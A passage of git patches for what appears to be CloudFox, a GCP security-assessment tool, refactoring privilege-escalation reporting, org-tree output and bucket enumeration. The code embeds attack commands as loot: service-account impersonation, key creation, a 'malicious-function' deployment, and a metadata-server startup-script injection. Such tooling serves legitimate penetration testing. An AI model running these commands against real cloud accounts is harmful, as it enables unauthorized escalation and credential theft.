as-is if we can't infer domain + return group +} + // getGroupMemberships retrieves the groups that the current identity is a member of func (m *WhoAmIModule) getGroupMemberships(ctx context.Context, logger internal.Logger) { + // Normalize provided groups to full email format + var normalizedGroups []string + for _, group := range m.ProvidedGroups { + normalizedGroups = append(normalizedGroups, m.normalizeGroupEmail(group)) + } + m.ProvidedGroups = normalizedGroups + // Store provided groups m.Identity.GroupsProvided = m.ProvidedGroups @@ -649,7 +688,6 @@ func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal path := PrivilegeEscalationPath{ Name: fmt.Sprintf("Impersonate %s", target.ServiceAccount), Description: "Can generate access tokens for this service account", - Risk: "HIGH", Command: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", target.ServiceAccount), } m.PrivEscPaths = append(m.PrivEscPaths, path) @@ -659,7 +697,6 @@ func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal path := PrivilegeEscalationPath{ Name: fmt.Sprintf("Create key for %s", target.ServiceAccount), Description: "Can create persistent service account keys", - Risk: "CRITICAL", Command: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", target.ServiceAccount), } m.PrivEscPaths = append(m.PrivEscPaths, path) @@ -706,42 +743,36 @@ func getPrivEscPathsForRole(role, projectID string) []PrivilegeEscalationPath { paths = append(paths, PrivilegeEscalationPath{ Name: "Token Creator - Impersonate any SA", Description: "Can generate access tokens for any service account in the project", - Risk: "CRITICAL", Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", projectID), }) case "roles/iam.serviceAccountKeyAdmin": paths = append(paths, PrivilegeEscalationPath{ Name: "Key Admin - Create persistent keys", Description: "Can create service account keys for any SA", - Risk: "CRITICAL", Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", projectID), }) case "roles/cloudfunctions.admin": paths = append(paths, PrivilegeEscalationPath{ Name: "Cloud Functions Admin - Code Execution", Description: "Can deploy Cloud Functions with SA permissions", - Risk: "HIGH", Command: "gcloud functions deploy malicious-function --runtime=python39 --trigger-http --service-account=", }) case "roles/compute.admin": paths = append(paths, PrivilegeEscalationPath{ Name: "Compute Admin - Metadata Injection", Description: "Can add startup scripts with SA access", - Risk: "HIGH", Command: "gcloud compute instances add-metadata --metadata=startup-script='curl -H \"Metadata-Flavor: Google\" http://metadata/...'", }) case "roles/container.admin": paths = append(paths, PrivilegeEscalationPath{ Name: "Container Admin - Pod Deployment", Description: "Can deploy pods with service account access", - Risk: "HIGH", Command: fmt.Sprintf("gcloud container clusters get-credentials --project=%s", projectID), }) case "roles/owner", "roles/editor": paths = append(paths, PrivilegeEscalationPath{ Name: "Owner/Editor - Full Project Access", Description: "Has full control over project resources", - Risk: "CRITICAL", Command: fmt.Sprintf("gcloud projects get-iam-policy %s", projectID), }) } @@ -801,11 +832,10 @@ func (m *WhoAmIModule) generateLoot() { // Privilege escalation loot for _, path := range m.PrivEscPaths { m.LootMap["whoami-privesc"].Contents += fmt.Sprintf( - "## %s [%s]\n"+ + "## %s\n"+ "# %s\n"+ "%s\n\n", path.Name, - path.Risk, path.Description, path.Command, ) @@ -1033,7 +1063,6 @@ func (m *WhoAmIModule) buildTables() []internal.TableFile { if len(m.PrivEscPaths) > 0 { privescHeader := []string{ "Path Name", - "Risk", "Description", "Command", } @@ -1042,7 +1071,6 @@ func (m *WhoAmIModule) buildTables() []internal.TableFile { for _, path := range m.PrivEscPaths { privescBody = append(privescBody, []string{ path.Name, - path.Risk, path.Description, path.Command, }) @@ -1062,6 +1090,7 @@ func (m *WhoAmIModule) buildTables() []internal.TableFile { func (m *WhoAmIModule) collectLootFiles() []internal.LootFile { var lootFiles []internal.LootFile for _, loot := range m.LootMap { + // Include loot files that have content and aren't just header comments if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { lootFiles = append(lootFiles, *loot) } From f3f98f24e3e71f13e8937499ae316d722ebab52a Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Thu, 15 Jan 2026 13:51:19 -0500 Subject: [PATCH 17/48] add org tree --- gcp/commands/organizations.go | 186 ++++++++++++++++++++++++++++++---- 1 file changed, 168 insertions(+), 18 deletions(-) diff --git a/gcp/commands/organizations.go b/gcp/commands/organizations.go index 864c32f6..db94202a 100644 --- a/gcp/commands/organizations.go +++ b/gcp/commands/organizations.go @@ -142,11 +142,18 @@ func (m *OrganizationsModule) initializeLootFiles() { Name: "organizations-map", Contents: "", } + m.LootMap["organizations-tree"] = &internal.LootFile{ + Name: "organizations-tree", + Contents: "", + } } func (m *OrganizationsModule) generateLoot() { - // Generate beautified tree view (org map) - m.generateTreeView() + // Generate expandable markdown tree view (org map) + m.generateMarkdownTreeView() + + // Generate standard ASCII tree view + m.generateTextTreeView() // Gcloud commands for organizations m.LootMap["organizations-commands"].Contents += "# ==========================================\n" @@ -193,10 +200,104 @@ func (m *OrganizationsModule) generateLoot() { } } -// generateTreeView creates a beautified ASCII tree of the organization hierarchy -func (m *OrganizationsModule) generateTreeView() { +// generateMarkdownTreeView creates a beautified expandable markdown tree of the organization hierarchy +func (m *OrganizationsModule) generateMarkdownTreeView() { tree := &m.LootMap["organizations-map"].Contents + *tree += "# GCP Organization Hierarchy\n\n" + + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + displayName := org.DisplayName + if displayName == "" { + displayName = orgID + } + + // Get direct children (folders and projects) of this org + childFolders := m.getChildFolders(org.Name) + childProjects := m.getChildProjects(org.Name) + + // Start expandable section for organization + *tree += fmt.Sprintf("
\n🏢 Organization: %s (%s)\n\n", displayName, orgID) + + // Add folders as expandable sections + for _, folder := range childFolders { + m.addFolderToMarkdownTree(tree, folder, 1) + } + + // Add projects directly under org + if len(childProjects) > 0 { + for _, proj := range childProjects { + projDisplayName := proj.DisplayName + if projDisplayName == "" { + projDisplayName = proj.ProjectID + } + *tree += fmt.Sprintf("- 📁 **Project:** %s (`%s`)\n", projDisplayName, proj.ProjectID) + } + *tree += "\n" + } + + *tree += "
\n\n" + } + + // Handle standalone projects (no org parent) + standaloneProjects := m.getStandaloneProjects() + if len(standaloneProjects) > 0 { + *tree += "
\n📦 Standalone Projects (no organization)\n\n" + for _, proj := range standaloneProjects { + displayName := proj.DisplayName + if displayName == "" { + displayName = proj.ProjectID + } + *tree += fmt.Sprintf("- 📁 **Project:** %s (`%s`)\n", displayName, proj.ProjectID) + } + *tree += "\n
\n" + } +} + +// addFolderToMarkdownTree recursively adds a folder and its children as expandable markdown +func (m *OrganizationsModule) addFolderToMarkdownTree(tree *string, folder orgsservice.FolderInfo, depth int) { + folderID := strings.TrimPrefix(folder.Name, "folders/") + displayName := folder.DisplayName + if displayName == "" { + displayName = folderID + } + + // Get children of this folder + childFolders := m.getChildFolders(folder.Name) + childProjects := m.getChildProjects(folder.Name) + + hasChildren := len(childFolders) > 0 || len(childProjects) > 0 + + if hasChildren { + // Folder with children - make it expandable + *tree += fmt.Sprintf("
\n📂 Folder: %s (%s)\n\n", displayName, folderID) + + // Add child folders + for _, childFolder := range childFolders { + m.addFolderToMarkdownTree(tree, childFolder, depth+1) + } + + // Add child projects + for _, proj := range childProjects { + projDisplayName := proj.DisplayName + if projDisplayName == "" { + projDisplayName = proj.ProjectID + } + *tree += fmt.Sprintf("- 📁 **Project:** %s (`%s`)\n", projDisplayName, proj.ProjectID) + } + + *tree += "\n
\n\n" + } else { + // Empty folder - just a list item + *tree += fmt.Sprintf("- 📂 **Folder:** %s (`%s`) *(empty)*\n", displayName, folderID) + } +} + +// generateTextTreeView creates a standard ASCII tree of the organization hierarchy +func (m *OrganizationsModule) generateTextTreeView() { + tree := &m.LootMap["organizations-tree"].Contents + for _, org := range m.Organizations { orgID := strings.TrimPrefix(org.Name, "organizations/") displayName := org.DisplayName @@ -216,7 +317,7 @@ func (m *OrganizationsModule) generateTreeView() { for _, folder := range childFolders { childIndex++ isLast := childIndex == totalChildren - m.addFolderToTree(tree, folder, "", isLast) + m.addFolderToTextTree(tree, folder, "", isLast) } // Add projects directly under org @@ -227,11 +328,11 @@ func (m *OrganizationsModule) generateTreeView() { if isLast { prefix = "└── " } - displayName := proj.DisplayName - if displayName == "" { - displayName = proj.ProjectID + projDisplayName := proj.DisplayName + if projDisplayName == "" { + projDisplayName = proj.ProjectID } - *tree += fmt.Sprintf("%sProject: %s (%s)\n", prefix, displayName, proj.ProjectID) + *tree += fmt.Sprintf("%sProject: %s (%s)\n", prefix, projDisplayName, proj.ProjectID) } *tree += "\n" @@ -256,8 +357,8 @@ func (m *OrganizationsModule) generateTreeView() { } } -// addFolderToTree recursively adds a folder and its children to the tree -func (m *OrganizationsModule) addFolderToTree(tree *string, folder orgsservice.FolderInfo, indent string, isLast bool) { +// addFolderToTextTree recursively adds a folder and its children to the ASCII tree +func (m *OrganizationsModule) addFolderToTextTree(tree *string, folder orgsservice.FolderInfo, indent string, isLast bool) { folderID := strings.TrimPrefix(folder.Name, "folders/") displayName := folder.DisplayName if displayName == "" { @@ -289,7 +390,7 @@ func (m *OrganizationsModule) addFolderToTree(tree *string, folder orgsservice.F for _, childFolder := range childFolders { childIndex++ childIsLast := childIndex == totalChildren - m.addFolderToTree(tree, childFolder, childIndent, childIsLast) + m.addFolderToTextTree(tree, childFolder, childIndent, childIsLast) } // Add child projects @@ -300,11 +401,11 @@ func (m *OrganizationsModule) addFolderToTree(tree *string, folder orgsservice.F if childIsLast { childPrefix = "└── " } - displayName := proj.DisplayName - if displayName == "" { - displayName = proj.ProjectID + projDisplayName := proj.DisplayName + if projDisplayName == "" { + projDisplayName = proj.ProjectID } - *tree += fmt.Sprintf("%s%sProject: %s (%s)\n", childIndent, childPrefix, displayName, proj.ProjectID) + *tree += fmt.Sprintf("%s%sProject: %s (%s)\n", childIndent, childPrefix, projDisplayName, proj.ProjectID) } } @@ -342,6 +443,34 @@ func (m *OrganizationsModule) getStandaloneProjects() []orgsservice.ProjectInfo return standalone } +// getFolderName returns the display name for a folder ID +func (m *OrganizationsModule) getFolderName(folderID string) string { + for _, folder := range m.Folders { + id := strings.TrimPrefix(folder.Name, "folders/") + if id == folderID { + if folder.DisplayName != "" { + return folder.DisplayName + } + return folderID + } + } + return folderID +} + +// getOrgName returns the display name for an organization ID +func (m *OrganizationsModule) getOrgName(orgID string) string { + for _, org := range m.Organizations { + id := strings.TrimPrefix(org.Name, "organizations/") + if id == orgID { + if org.DisplayName != "" { + return org.DisplayName + } + return orgID + } + } + return orgID +} + // ------------------------------ // Output Generation // ------------------------------ @@ -422,14 +551,35 @@ func (m *OrganizationsModule) buildTables() []internal.TableFile { var ancestryBody [][]string for _, ancestry := range m.Ancestry { if len(ancestry) > 0 { - // Build ancestry path string + // Build ancestry path string with names var path []string projectID := "" for _, node := range ancestry { if node.Type == "project" { projectID = node.ID + projName := m.GetProjectName(node.ID) + if projName != "" && projName != node.ID { + path = append(path, fmt.Sprintf("project:%s (%s)", projName, node.ID)) + } else { + path = append(path, fmt.Sprintf("project:%s", node.ID)) + } + } else if node.Type == "folder" { + folderName := m.getFolderName(node.ID) + if folderName != "" && folderName != node.ID { + path = append(path, fmt.Sprintf("folder:%s (%s)", folderName, node.ID)) + } else { + path = append(path, fmt.Sprintf("folder:%s", node.ID)) + } + } else if node.Type == "organization" { + orgName := m.getOrgName(node.ID) + if orgName != "" && orgName != node.ID { + path = append(path, fmt.Sprintf("organization:%s (%s)", orgName, node.ID)) + } else { + path = append(path, fmt.Sprintf("organization:%s", node.ID)) + } + } else { + path = append(path, fmt.Sprintf("%s:%s", node.Type, node.ID)) } - path = append(path, fmt.Sprintf("%s:%s", node.Type, node.ID)) } ancestryBody = append(ancestryBody, []string{ projectID, From baf62fdbb2ce495170825f1b0b42bcd067f7396d Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Thu, 15 Jan 2026 14:38:59 -0500 Subject: [PATCH 18/48] updated whoami for better privesc description --- gcp/commands/whoami.go | 123 +++++++++++++++++++++++++++++++---------- 1 file changed, 94 insertions(+), 29 deletions(-) diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index d76b253d..0c733865 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -119,9 +119,13 @@ type ImpersonationTarget struct { } type PrivilegeEscalationPath struct { - Name string - Description string - Command string + Name string + Description string + Command string + SourceRole string // The role that grants this potential path + SourceScope string // Where the role is granted (project ID, folder, org) + Confidence string // "confirmed" (verified via API) or "potential" (inferred from role) + RequiredPerms string // Specific permissions needed for this path } // ------------------------------ @@ -678,7 +682,7 @@ func (m *WhoAmIModule) findImpersonationTargets(ctx context.Context, logger inte func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal.Logger) { // Check for privilege escalation opportunities based on role bindings for _, rb := range m.RoleBindings { - paths := getPrivEscPathsForRole(rb.Role, rb.ScopeID) + paths := getPrivEscPathsForRole(rb.Role, rb.Scope, rb.ScopeID) m.PrivEscPaths = append(m.PrivEscPaths, paths...) } @@ -686,18 +690,26 @@ func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal for _, target := range m.ImpersonationTargets { if target.CanImpersonate { path := PrivilegeEscalationPath{ - Name: fmt.Sprintf("Impersonate %s", target.ServiceAccount), - Description: "Can generate access tokens for this service account", - Command: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", target.ServiceAccount), + Name: fmt.Sprintf("Impersonate %s", target.ServiceAccount), + Description: "Can generate access tokens for this service account", + Command: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", target.ServiceAccount), + SourceRole: "(via SA IAM policy)", + SourceScope: fmt.Sprintf("project/%s", target.ProjectID), + Confidence: "confirmed", + RequiredPerms: "iam.serviceAccounts.getAccessToken", } m.PrivEscPaths = append(m.PrivEscPaths, path) } if target.CanCreateKeys { path := PrivilegeEscalationPath{ - Name: fmt.Sprintf("Create key for %s", target.ServiceAccount), - Description: "Can create persistent service account keys", - Command: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", target.ServiceAccount), + Name: fmt.Sprintf("Create key for %s", target.ServiceAccount), + Description: "Can create persistent service account keys", + Command: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", target.ServiceAccount), + SourceRole: "(via SA IAM policy)", + SourceScope: fmt.Sprintf("project/%s", target.ProjectID), + Confidence: "confirmed", + RequiredPerms: "iam.serviceAccountKeys.create", } m.PrivEscPaths = append(m.PrivEscPaths, path) } @@ -735,45 +747,77 @@ func isDangerousRole(role string) bool { } // getPrivEscPathsForRole returns privilege escalation paths for a given role -func getPrivEscPathsForRole(role, projectID string) []PrivilegeEscalationPath { +// Note: These are POTENTIAL paths based on role name inference, not verified permissions. +// The actual ability to exploit these paths depends on specific GKE/resource configurations. +func getPrivEscPathsForRole(role, scopeType, scopeID string) []PrivilegeEscalationPath { var paths []PrivilegeEscalationPath + // Build scope display string + scopeDisplay := scopeID + if scopeType != "" { + scopeDisplay = fmt.Sprintf("%s/%s", scopeType, scopeID) + } + switch role { case "roles/iam.serviceAccountTokenCreator": paths = append(paths, PrivilegeEscalationPath{ - Name: "Token Creator - Impersonate any SA", - Description: "Can generate access tokens for any service account in the project", - Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", projectID), + Name: "Token Creator - Impersonate any SA", + Description: "Can generate access tokens for any service account in scope", + Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", scopeID), + SourceRole: role, + SourceScope: scopeDisplay, + Confidence: "potential", + RequiredPerms: "iam.serviceAccounts.getAccessToken", }) case "roles/iam.serviceAccountKeyAdmin": paths = append(paths, PrivilegeEscalationPath{ - Name: "Key Admin - Create persistent keys", - Description: "Can create service account keys for any SA", - Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", projectID), + Name: "Key Admin - Create persistent keys", + Description: "Can create service account keys for any SA in scope", + Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", scopeID), + SourceRole: role, + SourceScope: scopeDisplay, + Confidence: "potential", + RequiredPerms: "iam.serviceAccountKeys.create", }) case "roles/cloudfunctions.admin": paths = append(paths, PrivilegeEscalationPath{ - Name: "Cloud Functions Admin - Code Execution", - Description: "Can deploy Cloud Functions with SA permissions", - Command: "gcloud functions deploy malicious-function --runtime=python39 --trigger-http --service-account=", + Name: "Cloud Functions Admin - Code Execution", + Description: "Can deploy Cloud Functions with SA permissions", + Command: "gcloud functions deploy malicious-function --runtime=python39 --trigger-http --service-account=", + SourceRole: role, + SourceScope: scopeDisplay, + Confidence: "potential", + RequiredPerms: "cloudfunctions.functions.create, iam.serviceAccounts.actAs", }) case "roles/compute.admin": paths = append(paths, PrivilegeEscalationPath{ - Name: "Compute Admin - Metadata Injection", - Description: "Can add startup scripts with SA access", - Command: "gcloud compute instances add-metadata --metadata=startup-script='curl -H \"Metadata-Flavor: Google\" http://metadata/...'", + Name: "Compute Admin - Metadata Injection", + Description: "Can add startup scripts with SA access", + Command: "gcloud compute instances add-metadata --metadata=startup-script='curl -H \"Metadata-Flavor: Google\" http://metadata/...'", + SourceRole: role, + SourceScope: scopeDisplay, + Confidence: "potential", + RequiredPerms: "compute.instances.setMetadata", }) case "roles/container.admin": paths = append(paths, PrivilegeEscalationPath{ - Name: "Container Admin - Pod Deployment", - Description: "Can deploy pods with service account access", - Command: fmt.Sprintf("gcloud container clusters get-credentials --project=%s", projectID), + Name: "Container Admin - Pod Deployment", + Description: "May deploy pods with SA access (requires GKE cluster + K8s RBAC permissions)", + Command: fmt.Sprintf("gcloud container clusters get-credentials --project=%s", scopeID), + SourceRole: role, + SourceScope: scopeDisplay, + Confidence: "potential", + RequiredPerms: "container.clusters.getCredentials (GCP) + pods/create (K8s RBAC)", }) case "roles/owner", "roles/editor": paths = append(paths, PrivilegeEscalationPath{ - Name: "Owner/Editor - Full Project Access", - Description: "Has full control over project resources", - Command: fmt.Sprintf("gcloud projects get-iam-policy %s", projectID), + Name: "Owner/Editor - Full Project Access", + Description: "Has full control over project resources", + Command: fmt.Sprintf("gcloud projects get-iam-policy %s", scopeID), + SourceRole: role, + SourceScope: scopeDisplay, + Confidence: "confirmed", + RequiredPerms: "(broad permissions granted by role)", }) } @@ -831,12 +875,25 @@ func (m *WhoAmIModule) generateLoot() { // Privilege escalation loot for _, path := range m.PrivEscPaths { + confidenceNote := "" + if path.Confidence == "potential" { + confidenceNote = "# NOTE: This is a POTENTIAL path based on role name. Actual exploitation depends on resource configuration.\n" + } m.LootMap["whoami-privesc"].Contents += fmt.Sprintf( "## %s\n"+ "# %s\n"+ + "# Source: %s at %s\n"+ + "# Confidence: %s\n"+ + "# Required permissions: %s\n"+ + "%s"+ "%s\n\n", path.Name, path.Description, + path.SourceRole, + path.SourceScope, + path.Confidence, + path.RequiredPerms, + confidenceNote, path.Command, ) } @@ -1064,6 +1121,10 @@ func (m *WhoAmIModule) buildTables() []internal.TableFile { privescHeader := []string{ "Path Name", "Description", + "Source Role", + "Source Scope", + "Confidence", + "Required Perms", "Command", } @@ -1072,6 +1133,10 @@ func (m *WhoAmIModule) buildTables() []internal.TableFile { privescBody = append(privescBody, []string{ path.Name, path.Description, + path.SourceRole, + path.SourceScope, + path.Confidence, + path.RequiredPerms, path.Command, }) } From d473e31c0677ffc0b0a6502e44e2c3e6e489f8e9 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Thu, 15 Jan 2026 17:41:31 -0500 Subject: [PATCH 19/48] updated privesc checks --- gcp/commands/whoami.go | 218 +++++++++++++++++++++++++---------------- 1 file changed, 135 insertions(+), 83 deletions(-) diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index 0c733865..90543e28 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -8,6 +8,7 @@ import ( IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" OAuthService "github.com/BishopFox/cloudfox/gcp/services/oauthService" + privescservice "github.com/BishopFox/cloudfox/gcp/services/privescService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -679,14 +680,47 @@ func (m *WhoAmIModule) findImpersonationTargets(ctx context.Context, logger inte } // identifyPrivEscPaths identifies privilege escalation paths based on current permissions +// Uses privescService for comprehensive analysis consistent with the privesc module +// Filters results to only show paths relevant to the current identity and their groups +// Will use cached privesc data from context if available (e.g., from all-checks run) func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal.Logger) { - // Check for privilege escalation opportunities based on role bindings - for _, rb := range m.RoleBindings { - paths := getPrivEscPathsForRole(rb.Role, rb.Scope, rb.ScopeID) - m.PrivEscPaths = append(m.PrivEscPaths, paths...) + // Build set of principals to filter for (current identity + groups) + relevantPrincipals := make(map[string]bool) + // Add current identity email (with various formats) + relevantPrincipals[m.Identity.Email] = true + relevantPrincipals[strings.ToLower(m.Identity.Email)] = true + // Add with type prefixes + if m.Identity.Type == "serviceAccount" { + relevantPrincipals["serviceAccount:"+m.Identity.Email] = true + relevantPrincipals["serviceAccount:"+strings.ToLower(m.Identity.Email)] = true + } else { + relevantPrincipals["user:"+m.Identity.Email] = true + relevantPrincipals["user:"+strings.ToLower(m.Identity.Email)] = true + } + // Add groups (enumerated or provided) + for _, group := range m.Identity.Groups { + if group.Email != "" { + relevantPrincipals[group.Email] = true + relevantPrincipals[strings.ToLower(group.Email)] = true + relevantPrincipals["group:"+group.Email] = true + relevantPrincipals["group:"+strings.ToLower(group.Email)] = true + } + } + // Add special principals that apply to everyone + relevantPrincipals["allUsers"] = true + relevantPrincipals["allAuthenticatedUsers"] = true + + // Check if privesc cache is available from context (e.g., from all-checks run) + privescCache := gcpinternal.GetPrivescCacheFromContext(ctx) + if privescCache != nil && privescCache.IsPopulated() { + logger.InfoM("Using cached privesc data", globals.GCP_WHOAMI_MODULE_NAME) + m.identifyPrivEscPathsFromCache(privescCache, relevantPrincipals, logger) + } else { + // No cache available, run fresh privesc analysis + m.identifyPrivEscPathsFromAnalysis(ctx, relevantPrincipals, logger) } - // Check impersonation-based privilege escalation + // Also check impersonation-based privilege escalation from findImpersonationTargets for _, target := range m.ImpersonationTargets { if target.CanImpersonate { path := PrivilegeEscalationPath{ @@ -720,22 +754,117 @@ func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal } } +// identifyPrivEscPathsFromCache extracts privesc paths from the cached data +func (m *WhoAmIModule) identifyPrivEscPathsFromCache(cache *gcpinternal.PrivescCache, relevantPrincipals map[string]bool, logger internal.Logger) { + // Check each relevant principal against the cache + for principal := range relevantPrincipals { + hasPrivesc, methods := cache.HasPrivescForPrincipal(principal) + if !hasPrivesc { + continue + } + + for _, method := range methods { + privEscPath := PrivilegeEscalationPath{ + Name: method.Method, + Description: fmt.Sprintf("Risk Level: %s", method.RiskLevel), + Command: "", // Cache doesn't store exploit commands + SourceRole: principal, + SourceScope: method.Target, + Confidence: strings.ToLower(method.RiskLevel), + RequiredPerms: strings.Join(method.Permissions, ", "), + } + m.PrivEscPaths = append(m.PrivEscPaths, privEscPath) + } + } +} + +// identifyPrivEscPathsFromAnalysis runs fresh privesc analysis using privescService +func (m *WhoAmIModule) identifyPrivEscPathsFromAnalysis(ctx context.Context, relevantPrincipals map[string]bool, logger internal.Logger) { + // Use privescService for comprehensive privesc analysis + svc := privescservice.New() + + // Build project names map + projectNames := make(map[string]string) + for _, proj := range m.Identity.Projects { + if proj.DisplayName != "" { + projectNames[proj.ProjectID] = proj.DisplayName + } + } + + // Run combined privesc analysis (org, folder, project levels) + result, err := svc.CombinedPrivescAnalysis(ctx, m.ProjectIDs, projectNames) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not analyze privilege escalation paths") + return + } + + if result == nil { + return + } + + // Filter and convert privescservice.PrivescPath to whoami's PrivilegeEscalationPath format + // Only include paths where the principal matches current identity or their groups + for _, path := range result.AllPaths { + // Check if this path's principal is relevant to the current identity + if !relevantPrincipals[path.Principal] && !relevantPrincipals[strings.ToLower(path.Principal)] { + continue + } + + privEscPath := PrivilegeEscalationPath{ + Name: path.Method, + Description: path.Description, + Command: path.ExploitCommand, + SourceRole: fmt.Sprintf("%s (%s)", path.Principal, path.PrincipalType), + SourceScope: fmt.Sprintf("%s/%s", path.ScopeType, path.ScopeID), + Confidence: strings.ToLower(path.RiskLevel), + RequiredPerms: strings.Join(path.Permissions, ", "), + } + m.PrivEscPaths = append(m.PrivEscPaths, privEscPath) + } +} + // isDangerousRole checks if a role is considered dangerous +// Uses the dangerous permissions list from privescService for consistency func isDangerousRole(role string) bool { + // Roles that directly map to dangerous permissions from privescService dangerousRoles := []string{ + // Owner/Editor - broad access "roles/owner", "roles/editor", + // IAM roles - service account impersonation and key creation "roles/iam.securityAdmin", "roles/iam.serviceAccountAdmin", "roles/iam.serviceAccountKeyAdmin", "roles/iam.serviceAccountTokenCreator", + "roles/iam.serviceAccountUser", // iam.serviceAccounts.actAs + // Resource Manager - IAM policy modification "roles/resourcemanager.organizationAdmin", "roles/resourcemanager.folderAdmin", "roles/resourcemanager.projectIamAdmin", - "roles/cloudfunctions.admin", + // Compute - metadata injection, instance creation "roles/compute.admin", + "roles/compute.instanceAdmin", + "roles/compute.instanceAdmin.v1", + // Serverless - code execution with SA + "roles/cloudfunctions.admin", + "roles/cloudfunctions.developer", + "roles/run.admin", + "roles/run.developer", + // CI/CD - Cloud Build SA abuse + "roles/cloudbuild.builds.editor", + "roles/cloudbuild.builds.builder", + // GKE - cluster and pod access "roles/container.admin", + "roles/container.clusterAdmin", + // Storage "roles/storage.admin", + // Secrets + "roles/secretmanager.admin", + "roles/secretmanager.secretAccessor", + // Deployment Manager + "roles/deploymentmanager.editor", + // Org Policy + "roles/orgpolicy.policyAdmin", } for _, dr := range dangerousRoles { @@ -746,83 +875,6 @@ func isDangerousRole(role string) bool { return false } -// getPrivEscPathsForRole returns privilege escalation paths for a given role -// Note: These are POTENTIAL paths based on role name inference, not verified permissions. -// The actual ability to exploit these paths depends on specific GKE/resource configurations. -func getPrivEscPathsForRole(role, scopeType, scopeID string) []PrivilegeEscalationPath { - var paths []PrivilegeEscalationPath - - // Build scope display string - scopeDisplay := scopeID - if scopeType != "" { - scopeDisplay = fmt.Sprintf("%s/%s", scopeType, scopeID) - } - - switch role { - case "roles/iam.serviceAccountTokenCreator": - paths = append(paths, PrivilegeEscalationPath{ - Name: "Token Creator - Impersonate any SA", - Description: "Can generate access tokens for any service account in scope", - Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", scopeID), - SourceRole: role, - SourceScope: scopeDisplay, - Confidence: "potential", - RequiredPerms: "iam.serviceAccounts.getAccessToken", - }) - case "roles/iam.serviceAccountKeyAdmin": - paths = append(paths, PrivilegeEscalationPath{ - Name: "Key Admin - Create persistent keys", - Description: "Can create service account keys for any SA in scope", - Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", scopeID), - SourceRole: role, - SourceScope: scopeDisplay, - Confidence: "potential", - RequiredPerms: "iam.serviceAccountKeys.create", - }) - case "roles/cloudfunctions.admin": - paths = append(paths, PrivilegeEscalationPath{ - Name: "Cloud Functions Admin - Code Execution", - Description: "Can deploy Cloud Functions with SA permissions", - Command: "gcloud functions deploy malicious-function --runtime=python39 --trigger-http --service-account=", - SourceRole: role, - SourceScope: scopeDisplay, - Confidence: "potential", - RequiredPerms: "cloudfunctions.functions.create, iam.serviceAccounts.actAs", - }) - case "roles/compute.admin": - paths = append(paths, PrivilegeEscalationPath{ - Name: "Compute Admin - Metadata Injection", - Description: "Can add startup scripts with SA access", - Command: "gcloud compute instances add-metadata --metadata=startup-script='curl -H \"Metadata-Flavor: Google\" http://metadata/...'", - SourceRole: role, - SourceScope: scopeDisplay, - Confidence: "potential", - RequiredPerms: "compute.instances.setMetadata", - }) - case "roles/container.admin": - paths = append(paths, PrivilegeEscalationPath{ - Name: "Container Admin - Pod Deployment", - Description: "May deploy pods with SA access (requires GKE cluster + K8s RBAC permissions)", - Command: fmt.Sprintf("gcloud container clusters get-credentials --project=%s", scopeID), - SourceRole: role, - SourceScope: scopeDisplay, - Confidence: "potential", - RequiredPerms: "container.clusters.getCredentials (GCP) + pods/create (K8s RBAC)", - }) - case "roles/owner", "roles/editor": - paths = append(paths, PrivilegeEscalationPath{ - Name: "Owner/Editor - Full Project Access", - Description: "Has full control over project resources", - Command: fmt.Sprintf("gcloud projects get-iam-policy %s", scopeID), - SourceRole: role, - SourceScope: scopeDisplay, - Confidence: "confirmed", - RequiredPerms: "(broad permissions granted by role)", - }) - } - - return paths -} // ------------------------------ // Loot File Management From 2f80731e5bc27f213efcb20571638a7d557e79e9 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Thu, 15 Jan 2026 20:36:11 -0500 Subject: [PATCH 20/48] updated bucketenum to no limits and enumerate all --- gcp/commands/bucketenum.go | 327 ++++++++++++++---- .../bucketEnumService/bucketEnumService.go | 65 ++++ 2 files changed, 321 insertions(+), 71 deletions(-) diff --git a/gcp/commands/bucketenum.go b/gcp/commands/bucketenum.go index cbc13922..ac389fa7 100644 --- a/gcp/commands/bucketenum.go +++ b/gcp/commands/bucketenum.go @@ -14,7 +14,10 @@ import ( ) var ( - bucketEnumMaxObjects int + bucketEnumMaxObjects int + bucketEnumAllObjects bool + bucketEnumNoLimit bool + maxObjectsWasSet bool // tracks if --max-objects was explicitly set ) var GCPBucketEnumCommand = &cobra.Command{ @@ -39,19 +42,25 @@ File categories detected: - Source: Git repositories - Cloud: Cloud Functions source, build artifacts -WARNING: This may take a long time for buckets with many objects. -Use --max-objects to limit the scan.`, +Use --all-objects to enumerate ALL bucket contents (not just sensitive files). +WARNING: Full enumeration may take 